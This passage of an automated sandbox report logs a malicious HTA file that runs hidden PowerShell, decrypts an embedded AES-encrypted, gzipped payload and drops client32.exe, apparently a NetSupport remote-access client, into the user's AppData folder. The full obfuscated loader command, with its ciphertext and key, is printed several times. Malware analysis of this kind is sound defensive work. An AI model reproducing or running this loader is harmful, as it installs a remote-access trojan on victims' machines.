                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $cwWl = 'AAAAAAAAAAAAAAAAAAAAACgw0kTXfDt7VyGQWkvUWZWoRWwQ3foR84LKr0hIDBn55hU2P/QaH7UkicLpJA/xSJe84nJJo6jId61fi3om68eOCGqV7+xcDPABW0JXS0BNLSJCDSQlWtLiZ1E8R3S8ajj1PUmqy7WW9uT2VoNU9+010dg1zxZzgrNA/hcsUz5YVLblgbKewS5UQz7KSXbyb+CIClfTCOKLkZz7/MgCao3wN7ZeZ9Gb0u7SLIy7/xgnQsB0l3y8s69ruJDDmpYRh/RzGp2gf/qgjHb69/JjuK79SBgoIiM5oVSJ9CpWdthdRf2P9XkKGkXCBzJk9SV8CqUOLVMO0s3WHoiyqMsy+pqxJ4e/1jontj7rpiNv74j3Axt+r8La7T/hMWUnuxUgJbbnYl3FdW8s+G5JNU2lt2QBmjnyCxdZEhHS37qR0lcaXLNh7PQHbDGNYuMxnA6GJlxD0f87eY0FNf6zB/eR50WXPe/DXv/2VOm4h7EONAY3PyeLB6cFgk5v+vcMZz1G3FHk+oD59x4TIQ/jSbjrv1tBgAK4PwwUkiat07QTB8NB6LWM7kzWo7HjPZyGY+DvUE1B5PoEFLx54pWq3feDtfCTSpTbRyLKDvK0nXyFp/G/PV523VBKf67xcBp4jYYN0tRKraOrZoUhErSuWwHHbgshkWMXIc+l1PJDcozYEeFSzmwlBM2jFbwg0yMOkBZG4tcB0WxvMT2cmatL9Cem3kfSU75JXtNn4spkMmxgPemj2lDy7zR1O9HP6kBKK+BjI3gFMb9Ry8Y1XwIVbuRW2UYypeCbXN38X9tvobSoJuBZQSe9Wj2TyHbRMHmbRLqU/tOvc/zQFUwqWAJ35WKeKei0PA4ioeHdhfZUxES8DjE0qSOJ3xNCxb/CQtf5HWEiLOpuXHlrHfEvyvBv0bYdrLzqZGBt9Wnyyl/ULpYqA5jNbUblmlaCeQgfQqpN9JaEIILd/WRa2PZ15h459LGu0en5qVzPNFtLZA+WkpfbXVyyXlcop8wApuAZTYj70NHYqkevtwO9/5jrAew4VqzCHOg2AAORrYEcnIOYJ+VnQVArdafr/6JOJiUGDfpzqL8agehMghJttIKhbaTtw3JXM42ZXYlE11kZt5PK56YJ3z/5o6URS7i1TdNR5oycuY5kMyjfU4f53FC65Md/65hgrRKTGDjWaUCKRazVMpLHSrOMk4x6nKQCn/LspzRVHtBWxfpvfq8kSxAP1WfuQDn8GZ0z4sbAPyZDZPtsS35qdlMo7wjJPr5H/lrd0Em7GMqWijrCpuf5OnwZEHFaM9MaFLOUAynybcJEor/t4xmDSIhKEzXjSR6X6wRkzE3Ph08iwneJLkiTHUjABGexMKq8XZtQJNPi3oecXcDMsJl9hR3dnSX8d2uijZ15EyeLG8esgN9njz3GNN6i6AOa8nXIKVLOTJ5fW1Lq6sI93oVUmTWNrqlO++5wKQe7PyfDzXcbF7x5vIGs0+MvugezqSEJInVTYjx6gcEKW6bnJq0n5pZU62ZO37pXLEodb7pM4qJ+5gTI1GMy0n94xqmVlTWhenE=';$osjnGw = 'RVJyQ3FGSFZXTUVhcnp3S2ZYcFp2VHh0RXFUdmJYWHU=';$HYoyNbe = New-Object 'System.Security.Cryptography.AesManaged';$HYoyNbe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HYoyNbe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HYoyNbe.BlockSize = 128;$HYoyNbe.KeySize = 256;$HYoyNbe.Key = [System.Convert]::FromBase64String($osjnGw);$MojFO = [System.Convert]::FromBase64String($cwWl);$QfSOiZVu = $MojFO[0..15];$HYoyNbe.IV = $QfSOiZVu;$vcdTgJDLO = $HYoyNbe.CreateDecryptor();$kQWgqYwUt = $vcdTgJDLO.TransformFinalBlock($MojFO, 16, $MojFO.Length - 16);$HYoyNbe.Dispose();$EnAuWBr = New-Object System.IO.MemoryStream( , $kQWgqYwUt );$sQFTam = New-Object System.IO.MemoryStream;$sHlBzafiX = New-Object System.IO.Compression.GzipStream $EnAuWBr, ([IO.Compression.CompressionMode]::Decompress);$sHlBzafiX.CopyTo( $sQFTam );$sHlBzafiX.Close();$EnAuWBr.Close();[byte[]] $DNZNxE = $sQFTam.ToArray();$xZHVto = [System.Text.Encoding]::UTF8.GetString($DNZNxE);$xZHVto | powershell - }Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c powershell.exe $cwWl = 'AAAAAAAAAAAAAAAAAAAAACgw0kTXfDt7VyGQWkvUWZWoRWwQ3foR84LKr0hIDBn55hU2P/QaH7UkicLpJA/xSJe84nJJo6jId61fi3om68eOCGqV7+xcDPABW0JXS0BNLSJCDSQlWtLiZ1E8R3S8ajj1PUmqy7WW9uT2VoNU9+010dg1zxZzgrNA/hcsUz5YVLblgbKewS5UQz7KSXbyb+CIClfTCOKLkZz7/MgCao3wN7ZeZ9Gb0u7SLIy7/xgnQsB0l3y8s69ruJDDmpYRh/RzGp2gf/qgjHb69/JjuK79SBgoIiM5oVSJ9CpWdthdRf2P9XkKGkXCBzJk9SV8CqUOLVMO0s3WHoiyqMsy+pqxJ4e/1jontj7rpiNv74j3Axt+r8La7T/hMWUnuxUgJbbnYl3FdW8s+G5JNU2lt2QBmjnyCxdZEhHS37qR0lcaXLNh7PQHbDGNYuMxnA6GJlxD0f87eY0FNf6zB/eR50WXPe/DXv/2VOm4h7EONAY3PyeLB6cFgk5v+vcMZz1G3FHk+oD59x4TIQ/jSbjrv1tBgAK4PwwUkiat07QTB8NB6LWM7kzWo7HjPZyGY+DvUE1B5PoEFLx54pWq3feDtfCTSpTbRyLKDvK0nXyFp/G/PV523VBKf67xcBp4jYYN0tRKraOrZoUhErSuWwHHbgshkWMXIc+l1PJDcozYEeFSzmwlBM2jFbwg0yMOkBZG4tcB0WxvMT2cmatL9Cem3kfSU75JXtNn4spkMmxgPemj2lDy7zR1O9HP6kBKK+BjI3gFMb9Ry8Y1XwIVbuRW2UYypeCbXN38X9tvobSoJuBZQSe9Wj2TyHbRMHmbRLqU/tOvc/zQFUwqWAJ35WKeKei0PA4ioeHdhfZUxES8DjE0qSOJ3xNCxb/CQtf5HWEiLOpuXHlrHfEvyvBv0bYdrLzqZGBt9Wnyyl/ULpYqA5jNbUblmlaCeQgfQqpN9JaEIILd/WRa2PZ15h459LGu0en5qVzPNFtLZA+WkpfbXVyyXlcop8wApuAZTYj70NHYqkevtwO9/5jrAew4VqzCHOg2AAORrYEcnIOYJ+VnQVArdafr/6JOJiUGDfpzqL8agehMghJttIKhbaTtw3JXM42ZXYlE11kZt5PK56YJ3z/5o6URS7i1TdNR5oycuY5kMyjfU4f53FC65Md/65hgrRKTGDjWaUCKRazVMpLHSrOMk4x6nKQCn/LspzRVHtBWxfpvfq8kSxAP1WfuQDn8GZ0z4sbAPyZDZPtsS35qdlMo7wjJPr5H/lrd0Em7GMqWijrCpuf5OnwZEHFaM9MaFLOUAynybcJEor/t4xmDSIhKEzXjSR6X6wRkzE3Ph08iwneJLkiTHUjABGexMKq8XZtQJNPi3oecXcDMsJl9hR3dnSX8d2uijZ15EyeLG8esgN9njz3GNN6i6AOa8nXIKVLOTJ5fW1Lq6sI93oVUmTWNrqlO++5wKQe7PyfDzXcbF7x5vIGs0+MvugezqSEJInVTYjx6gcEKW6bnJq0n5pZU62ZO37pXLEodb7pM4qJ+5gTI1GMy0n94xqmVlTWhenE=';$osjnGw = 'RVJyQ3FGSFZXTUVhcnp3S2ZYcFp2VHh0RXFUdmJYWHU=';$HYoyNbe = New-Object 'System.Security.Cryptography.AesManaged';$HYoyNbe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HYoyNbe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HYoyNbe.BlockSize = 128;$HYoyNbe.KeySize = 256;$HYoyNbe.Key = [System.Convert]::FromBase64String($osjnGw);$MojFO = [System.Convert]::FromBase64String($cwWl);$QfSOiZVu = $MojFO[0..15];$HYoyNbe.IV = $QfSOiZVu;$vcdTgJDLO = $HYoyNbe.CreateDecryptor();$kQWgqYwUt = $vcdTgJDLO.TransformFinalBlock($MojFO, 16, $MojFO.Length - 16);$HYoyNbe.Dispose();$EnAuWBr = New-Object System.IO.MemoryStream( , $kQWgqYwUt );$sQFTam = New-Object System.IO.MemoryStream;$sHlBzafiX = New-Object System.IO.Compression.GzipStream $EnAuWBr, ([IO.Compression.CompressionMode]::Decompress);$sHlBzafiX.CopyTo( $sQFTam );$sHlBzafiX.Close();$EnAuWBr.Close();[byte[]] $DNZNxE = $sQFTam.ToArray();$xZHVto = [System.Text.Encoding]::UTF8.GetString($DNZNxE);$xZHVto | powershell - Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe $cwWl = 'AAAAAAAAAAAAAAAAAAAAACgw0kTXfDt7VyGQWkvUWZWoRWwQ3foR84LKr0hIDBn55hU2P/QaH7UkicLpJA/xSJe84nJJo6jId61fi3om68eOCGqV7+xcDPABW0JXS0BNLSJCDSQlWtLiZ1E8R3S8ajj1PUmqy7WW9uT2VoNU9+010dg1zxZzgrNA/hcsUz5YVLblgbKewS5UQz7KSXbyb+CIClfTCOKLkZz7/MgCao3wN7ZeZ9Gb0u7SLIy7/xgnQsB0l3y8s69ruJDDmpYRh/RzGp2gf/qgjHb69/JjuK79SBgoIiM5oVSJ9CpWdthdRf2P9XkKGkXCBzJk9SV8CqUOLVMO0s3WHoiyqMsy+pqxJ4e/1jontj7rpiNv74j3Axt+r8La7T/hMWUnuxUgJbbnYl3FdW8s+G5JNU2lt2QBmjnyCxdZEhHS37qR0lcaXLNh7PQHbDGNYuMxnA6GJlxD0f87eY0FNf6zB/eR50WXPe/DXv/2VOm4h7EONAY3PyeLB6cFgk5v+vcMZz1G3FHk+oD59x4TIQ/jSbjrv1tBgAK4PwwUkiat07QTB8NB6LWM7kzWo7HjPZyGY+DvUE1B5PoEFLx54pWq3feDtfCTSpTbRyLKDvK0nXyFp/G/PV523VBKf67xcBp4jYYN0tRKraOrZoUhErSuWwHHbgshkWMXIc+l1PJDcozYEeFSzmwlBM2jFbwg0yMOkBZG4tcB0WxvMT2cmatL9Cem3kfSU75JXtNn4spkMmxgPemj2lDy7zR1O9HP6kBKK+BjI3gFMb9Ry8Y1XwIVbuRW2UYypeCbXN38X9tvobSoJuBZQSe9Wj2TyHbRMHmbRLqU/tOvc/zQFUwqWAJ35WKeKei0PA4ioeHdhfZUxES8DjE0qSOJ3xNCxb/CQtf5HWEiLOpuXHlrHfEvyvBv0bYdrLzqZGBt9Wnyyl/ULpYqA5jNbUblmlaCeQgfQqpN9JaEIILd/WRa2PZ15h459LGu0en5qVzPNFtLZA+WkpfbXVyyXlcop8wApuAZTYj70NHYqkevtwO9/5jrAew4VqzCHOg2AAORrYEcnIOYJ+VnQVArdafr/6JOJiUGDfpzqL8agehMghJttIKhbaTtw3JXM42ZXYlE11kZt5PK56YJ3z/5o6URS7i1TdNR5oycuY5kMyjfU4f53FC65Md/65hgrRKTGDjWaUCKRazVMpLHSrOMk4x6nKQCn/LspzRVHtBWxfpvfq8kSxAP1WfuQDn8GZ0z4sbAPyZDZPtsS35qdlMo7wjJPr5H/lrd0Em7GMqWijrCpuf5OnwZEHFaM9MaFLOUAynybcJEor/t4xmDSIhKEzXjSR6X6wRkzE3Ph08iwneJLkiTHUjABGexMKq8XZtQJNPi3oecXcDMsJl9hR3dnSX8d2uijZ15EyeLG8esgN9njz3GNN6i6AOa8nXIKVLOTJ5fW1Lq6sI93oVUmTWNrqlO++5wKQe7PyfDzXcbF7x5vIGs0+MvugezqSEJInVTYjx6gcEKW6bnJq0n5pZU62ZO37pXLEodb7pM4qJ+5gTI1GMy0n94xqmVlTWhenE=';$osjnGw = 'RVJyQ3FGSFZXTUVhcnp3S2ZYcFp2VHh0RXFUdmJYWHU=';$HYoyNbe = New-Object 'System.Security.Cryptography.AesManaged';$HYoyNbe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HYoyNbe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HYoyNbe.BlockSize = 128;$HYoyNbe.KeySize = 256;$HYoyNbe.Key = [System.Convert]::FromBase64String($osjnGw);$MojFO = [System.Convert]::FromBase64String($cwWl);$QfSOiZVu = $MojFO[0..15];$HYoyNbe.IV = $QfSOiZVu;$vcdTgJDLO = $HYoyNbe.CreateDecryptor();$kQWgqYwUt = $vcdTgJDLO.TransformFinalBlock($MojFO, 16, $MojFO.Length - 16);$HYoyNbe.Dispose();$EnAuWBr = New-Object System.IO.MemoryStream( , $kQWgqYwUt );$sQFTam = New-Object System.IO.MemoryStream;$sHlBzafiX = New-Object System.IO.Compression.GzipStream $EnAuWBr, ([IO.Compression.CompressionMode]::Decompress);$sHlBzafiX.CopyTo( $sQFTam );$sHlBzafiX.Close();$EnAuWBr.Close();[byte[]] $DNZNxE = $sQFTam.ToArray();$xZHVto = [System.Text.Encoding]::UTF8.GetString($DNZNxE);$xZHVto Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell - Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\MediaContent\client32.exe "C:\Users\user\AppData\Roaming\MediaContent\client32.exe" Jump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MediaContent.zipJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_akb2bcfk.ehh.ps1Jump to behavior
                                Source: classification engineClassification label: mal100.troj.evad.winHTA@14/27@7/3
                                Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dllJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5356:120:WilError_01
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6628:120:WilError_01
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$sHlBzafiX.CopyTo( $sQFTam );$sHlBzafiX.Close();$EnAuWBr.Close();[byte[]] $DNZNxE = $sQFTam.ToArray();$xZHVto = [System.Text.Encoding]::UTF8.GetString($DNZNxE);$xZHVto | powershell - }@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell user required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$sHlBzafiX.CopyTo( $sQFTam );$sHlBzafiX.Close();$EnAuWBr.Close();[byte[]] $DNZNxE = $sQFTam.ToArray();$xZHVto = [System.Text.Encoding]::UTF8.GetString($DNZNxE);$xZHVto@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell user required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Roaming\MediaContent\Client32648.iniJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\AppData\Roaming\MediaContent\client32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\AppData\Roaming\MediaContent\client32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                                Source: C:\Users\user\AppData\Roaming\MediaContent\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MediaContent\msvcr100.dllJump to behavior
                                Source: Client_version(updater).htaStatic file information: File size 1424291 > 1048576
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe, 00000015.00000002.519812691.000000006C171000.00000020.00000001.01000000.00000016.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 00000015.00000002.520311808.000000006E422000.00000002.00000001.01000000.00000014.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000015.00000002.519267559.0000000011193000.00000002.00000001.01000000.00000013.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: client32.exe, 00000015.00000000.320629163.0000000001232000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000015.00000002.520137464.000000006C235000.00000002.00000001.01000000.00000015.sdmp

                                Data Obfuscation

                                barindex
                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $cwWl = 'AAAAAAAAAAAAAAAAAAAAACgw0kTXfDt7VyGQWkvUWZWoRWwQ3foR84LKr0hIDBn55hU2P/QaH7UkicLpJA/xSJe84nJJo6jId61fi3om68eOCGqV7+xcDPABW0JXS0BNLSJCDSQlWtLiZ1E8R3S8ajj1PUmqy7WW9uT2VoNU9+010dg1zxZzgrNA/hcsUz5YVLblgbKewS5UQz7KSXbyb+CIClfTCOKLkZz7/MgCao3wN7ZeZ9Gb0u7SLIy7/xgnQsB0l3y8s69ruJDDmpYRh/RzGp2gf/qgjHb69/JjuK79SBgoIiM5oVSJ9CpWdthdRf2P9XkKGkXCBzJk9SV8CqUOLVMO0s3WHoiyqMsy+pqxJ4e/1jontj7rpiNv74j3Axt+r8La7T/hMWUnuxUgJbbnYl3FdW8s+G5JNU2lt2QBmjnyCxdZEhHS37qR0lcaXLNh7PQHbDGNYuMxnA6GJlxD0f87eY0FNf6zB/eR50WXPe/DXv/2VOm4h7EONAY3PyeLB6cFgk5v+vcMZz1G3FHk+oD59x4TIQ/jSbjrv1tBgAK4PwwUkiat07QTB8NB6LWM7kzWo7HjPZyGY+DvUE1B5PoEFLx54pWq3feDtfCTSpTbRyLKDvK0nXyFp/G/PV523VBKf67xcBp4jYYN0tRKraOrZoUhErSuWwHHbgshkWMXIc+l1PJDcozYEeFSzmwlBM2jFbwg0yMOkBZG4tcB0WxvMT2cmatL9Cem3kfSU75JXtNn4spkMmxgPemj2lDy7zR1O9HP6kBKK+BjI3gFMb9Ry8Y1XwIVbuRW2UYypeCbXN38X9tvobSoJuBZQSe9Wj2TyHbRMHmbRLqU/tOvc/zQFUwqWAJ35WKeKei0PA4ioeHdhfZUxES8DjE0qSOJ3xNCxb/CQtf5HWEiLOpuXHlrHfEvyvBv0bYdrLzqZGBt9Wnyyl/ULpYqA5jNbUblmlaCeQgfQqpN9JaEIILd/WRa2PZ15h459LGu0en5qVzPNFtLZA+WkpfbXVyyXlcop8wApuAZTYj70NHYqkevtwO9/5jrAew4VqzCHOg2AAORrYEcnIOYJ+VnQVArdafr/6JOJiUGDfpzqL8agehMghJttIKhbaTtw3JXM42ZXYlE11kZt5PK56YJ3z/5o6URS7i1TdNR5oycuY5kMyjfU4f53FC65Md/65hgrRKTGDjWaUCKRazVMpLHSrOMk4x6nKQCn/LspzRVHtBWxfpvfq8kSxAP1WfuQDn8GZ0z4sbAPyZDZPtsS35qdlMo7wjJPr5H/lrd0Em7GMqWijrCpuf5OnwZEHFaM9MaFLOUAynybcJEor/t4xmDSIhKEzXjSR6X6wRkzE3Ph08iwneJLkiTHUjABGexMKq8XZtQJNPi3oecXcDMsJl9hR3dnSX8d2uijZ15EyeLG8esgN9njz3GNN6i6AOa8nXIKVLOTJ5fW1Lq6sI93oVUmTWNrqlO++5wKQe7PyfDzXcbF7x5vIGs0+MvugezqSEJInVTYjx6gcEKW6bnJq0n5pZU62ZO37pXLEodb7pM4qJ+5gTI1GMy0n94xqmVlTWhenE=';$osjnGw = 'RVJyQ3FGSFZXTUVhcnp3S2ZYcFp2VHh0RXFUdmJYWHU=';$HYoyNbe = New-Object 'System.Security.Cryptography.AesManaged';$HYoyNbe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HYoyNbe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HYoyNbe.BlockSize = 128;$HYoyNbe.KeySize = 256;$HYoyNbe.Key = [System.Convert]::FromBase64String($osjnGw);$MojFO = [System.Convert]::FromBase64String($cwWl);$QfSOiZVu = $MojFO[0..15];$HYoyNbe.IV = $QfSOiZVu;$vcdTgJDLO = $HYoyNbe.CreateDecryptor();$kQWgqYwUt = $vcdTgJDLO.TransformFinalBlock($MojFO, 16, $MojFO.Length - 16);$HYoyNbe.Dispose();$EnAuWBr = New-Object System.IO.MemoryStream( , $kQWgqYwUt );$sQFTam = New-Object System.IO.MemoryStream;$sHlBzafiX = New-Object System.IO.Compression.GzipStream $EnAuWBr, ([IO.Compression.CompressionMode]::Decompress);$sHlBzafiX.CopyTo( $sQFTam );$sHlBzafiX.Close();$EnAuWBr.Close();[byte[]] $DNZNxE = $sQFTam.ToArray();$xZHVto = [System.Text.Encoding]::UTF8.GetString($DNZNxE);$xZHVto | powershell - }
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe $cwWl = 'AAAAAAAAAAAAAAAAAAAAACgw0kTXfDt7VyGQWkvUWZWoRWwQ3foR84LKr0hIDBn55hU2P/QaH7UkicLpJA/xSJe84nJJo6jId61fi3om68eOCGqV7+xcDPABW0JXS0BNLSJCDSQlWtLiZ1E8R3S8ajj1PUmqy7WW9uT2VoNU9+010dg1zxZzgrNA/hcsUz5YVLblgbKewS5UQz7KSXbyb+CIClfTCOKLkZz7/MgCao3wN7ZeZ9Gb0u7SLIy7/xgnQsB0l3y8s69ruJDDmpYRh/RzGp2gf/qgjHb69/JjuK79SBgoIiM5oVSJ9CpWdthdRf2P9XkKGkXCBzJk9SV8CqUOLVMO0s3WHoiyqMsy+pqxJ4e/1jontj7rpiNv74j3Axt+r8La7T/hMWUnuxUgJbbnYl3FdW8s+G5JNU2lt2QBmjnyCxdZEhHS37qR0lcaXLNh7PQHbDGNYuMxnA6GJlxD0f87eY0FNf6zB/eR50WXPe/DXv/2VOm4h7EONAY3PyeLB6cFgk5v+vcMZz1G3FHk+oD59x4TIQ/jSbjrv1tBgAK4PwwUkiat07QTB8NB6LWM7kzWo7HjPZyGY+DvUE1B5PoEFLx54pWq3feDtfCTSpTbRyLKDvK0nXyFp/G/PV523VBKf67xcBp4jYYN0tRKraOrZoUhErSuWwHHbgshkWMXIc+l1PJDcozYEeFSzmwlBM2jFbwg0yMOkBZG4tcB0WxvMT2cmatL9Cem3kfSU75JXtNn4spkMmxgPemj2lDy7zR1O9HP6kBKK+BjI3gFMb9Ry8Y1XwIVbuRW2UYypeCbXN38X9tvobSoJuBZQSe9Wj2TyHbRMHmbRLqU/tOvc/zQFUwqWAJ35WKeKei0PA4ioeHdhfZUxES8DjE0qSOJ3xNCxb/C